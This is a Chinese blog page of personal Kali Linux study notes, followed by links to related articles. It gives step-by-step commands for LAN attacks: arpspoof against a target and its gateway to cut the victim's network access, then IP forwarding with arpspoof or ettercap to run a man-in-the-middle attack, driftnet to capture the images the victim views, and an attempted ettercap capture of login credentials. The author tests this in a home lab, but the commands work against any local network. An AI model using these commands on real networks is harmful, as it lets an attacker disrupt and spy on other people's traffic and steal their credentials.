一些学习网站

http://xiao106347.blog.163.com/blog/static/2159920782013111995945233/

http://xiao106347.blog.163.com/blog/static/21599207820146302851904/

http://xiao106347.blog.163.com/blog/static/215992078201352055231824/

下载系统:http://www.cnblogs.com/CyLee/p/5726521.html

终端输入armitage,然后一直确认即可

出现异常尝试如下几个步骤

1、命令行输入service postgresql start(或者/etc/init.d/postgresql start)

2、找到图形界面把metasploit framework打开,会自动创建数据库,自动连接(或者尝试msfdb start + msfconsole,反正我是没用)

3、再次使用armitage

arpspoof攻击局域网(虚拟机攻击本机)

注意,必须将虚拟机网络设置为【桥接模式】

arpspoof -i 【我的网卡】 -t 【攻击目标ip】 【攻击目标默认网关】

【我的网卡】:虚拟机中打开终端,输入ifconfig查看,通常都是eth0;

【攻击目标ip】:本机中打开终端,输入ifconfg查看,我的是192.168.1.101,我是通过打开【网络适配器】查看的

【攻击目标默认网关ip】:本机中打开终端,输入ifconfg查看,通常是192.168.1.1,我是通过打开【网络适配器->高级->tcp/ip】查看的

然后在虚拟机输入此demo:

arpspoof -i eth0 -t 192.168.1.101 192.168.1.1

这样本机就无法访问网络了。按ctrl+c结束

获取局域网内攻击目标的图片

echo 1 >/proc/sys/net/ipv4/ip_forward      #默认是0,通过这行修改为1,这种方式叫【ip转发】此时不会有断网现象了

arpspoof -i eth0 -t 192.168.1.101 192.168.1.1  #这种方式叫【arp欺骗】

ettercap -i eth0 -Tq -M arp:remote /192.168.1.103// /192.168.1.1//  #【arp欺骗】,如果上面的欺骗+截取没有效果,可以尝试使用这个

另开一个终端,使用如下命令截取图片流量。然后目标电脑打开任何带图片的网站如QQ空间

driftnet -i eth0  #浏览图片截取(本人MAC系统以及MAC系统上的虚拟机都无法使用该功能)

(ps:可以通过arp -a 来获取欺骗的成果,如果发现两个类型为【动态】的ip分别为目标和网关即可,mac电脑暂时无法看出是否被欺骗)

获取局域网内攻击目标的登录信息

也需要先arp欺骗+ip转发

ettercap -Tq -i eth0 #登录账号密码截取(暂时无法实现)

kail-linux 安全之旅的更多相关文章

  1. kail linux 虚拟机安装实录(一) 新建虚拟机

    各位晚上好. 现在开始进行kail linux 在虚拟机上的安装. 我所使用的工具如下: kail linux 2.0   x64  http://mirrors.neusoft.edu.cn/kal ...

  2. 【Linux探索之旅】第二部分第二课:命令行,世界尽在掌握

    内容简介 1.第二部分第二课:命令行,世界尽在掌握 2.第二部分第三课预告:文件和目录,组织不会亏待你 命令行,世界尽在掌握 今天的标题是不是有点霸气侧漏呢? 读者:“小编,你为什么每次都要起这么非主 ...

  3. 【Linux探索之旅】第一部分第五课:Unity桌面,人生若只如初见

    内容简介 1.第一部分第五课:Unity桌面,人生若只如初见 2.第一部分第六课预告:Linux如何安装在虚拟机中 Unity桌面,人生若只如初见 不容易啊,经过了前几课的学习,我们认识了Linux是 ...

  4. 【Linux探索之旅】第二部分第五课:用户和权限,有权就任性

    内容简单介绍 .第二部分第五课:用户和权限,有权就任性 2.第二部分第六课预告:Nano,刚開始学习的人的文本编辑器 用户和权限.有权就任性 今天的标题也挺任性的啊,虽说小编是一个非常本分的人(真的吗 ...

  5. Kail Linux的安装方法

    众所周知,kail 是一个基于Debian的Linux发行版,它的目标就是为了在一个实用的工具包里尽可能多的包含渗透和审计工具 kail就实现了这个目标,里面包含有很多关于安全测试的开源工具,如果现在 ...

  6. kail linux虚拟机安装tools工具

    因为自己比较懒,有时候自己不想打字需要粘贴就安装了虚拟机tools工具,又因为自己脑子不好使所以就写一下步骤,以便以后用得着.我这里用得是kail linux系统,不知道contest能不能这样安,下 ...

  7. 虚拟机14安装kail Linux

    需要准备虚拟机和kail Linux镜像 1. 2.选择镜像安装,并且添加你的kail Linux镜像文件. 3. 4.在这里需要修改虚拟机名称,也可以不修改就用默认,然后在修改kail Linux的 ...

  8. MOOC Linux内核之旅小结【转】

    转自:https://blog.csdn.net/titer1/article/details/45345123 版权声明:本文为博主原创文章,未经博主允许不得转载. https://blog.csd ...

  9. Linux内核之旅

    http://www.kerneltravel.net/ Linux内核之旅 Linux Kernel Travel

  10. kail linux 系统下利用metaspolit工具渗透win7电脑

     注:只是测试,不可干违法的事. 一.metaspolit工具的介绍 1.1.metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新.被安全社区冠以“可以黑掉整个宇 ...

随机推荐

  1. iOS 中的第三方库管理工具

    xcode没有android studio中的gradle进行第三方库管理,但是有第三方的库管理工具CocoaPods,https://github.com/CocoaPods/CocoaPods/w ...

  2. Java for LeetCode 058 Length of Last Word

    Given a string s consists of upper/lower-case alphabets and empty space characters ' ', return the l ...

  3. 如何从sun公司官网下载java API文档(转载)

    相信很多同人和我一样,想去官网下载一份纯英文的java API文档,可使sun公司的网站让我实在很头疼,很乱,全是英文!所以就在网上下载了别人提供的下载!可是还是不甘心!其实多去看看这些英文的技术网站 ...

  4. Eclipse调试:F5、F6、F7、F8

    F5:跳入方法 F6:向下逐行调试 F7:跳出方法 F8:直接跳转到下一个断点 转载自:http://blog.sina.com.cn/s/blog_6271df6f0101d856.html

  5. AJAX省市县三级联动

    效果 开发结构参考AJAX,JSON用户校验 主要有两个核心文件 1,处理输入字符,进行后台搜索的servlet linkage.java package org.guangsoft.servlet; ...

  6. 化工厂装箱员(洛谷 P2530)

    题目描述 118号工厂是世界唯一秘密提炼锎的化工厂,由于提炼锎的难度非常高,技术不是十分完善,所以工厂生产的锎成品可能会有3种不同的纯度,A:100%,B:1%,C:0.01%,为了出售方便,必须 ...

  7. SPI试验---verilog(实用单通模式)

    SPI通信的读写操作 一.     SPI简介: SPI的通信原理很简单,它以主从方式工作,这种模式通常有一个主设备和一个或多个从设备,需要至少4根线,事实上3根也可以(单向传输时).也是所有基于SP ...

  8. SQL 总汇

    /* 启动MySQL */ net start mysql /* 连接与断开服务器 */ mysql -h 地址 -P 端口 -u 用户名 -p 密码 /* 跳过权限验证登录MySQL */ mysq ...

  9. Android常用查询网站

    一.老罗的Android之旅爱生活,爱Android http://blog.csdn.net/luoshengyang 二.Android中文API http://www.android-doc.c ...

  10. [原]C# Winform 文件编码批量转换工具

    在发布产品程序包时,往往需要对程序文件进行编码检查,写了一个可以批量修改文件编码格式的辅助工具,希望对有同样需求的童鞋有帮助. 1.程序界面: 2.核心代码: /// <summary> ...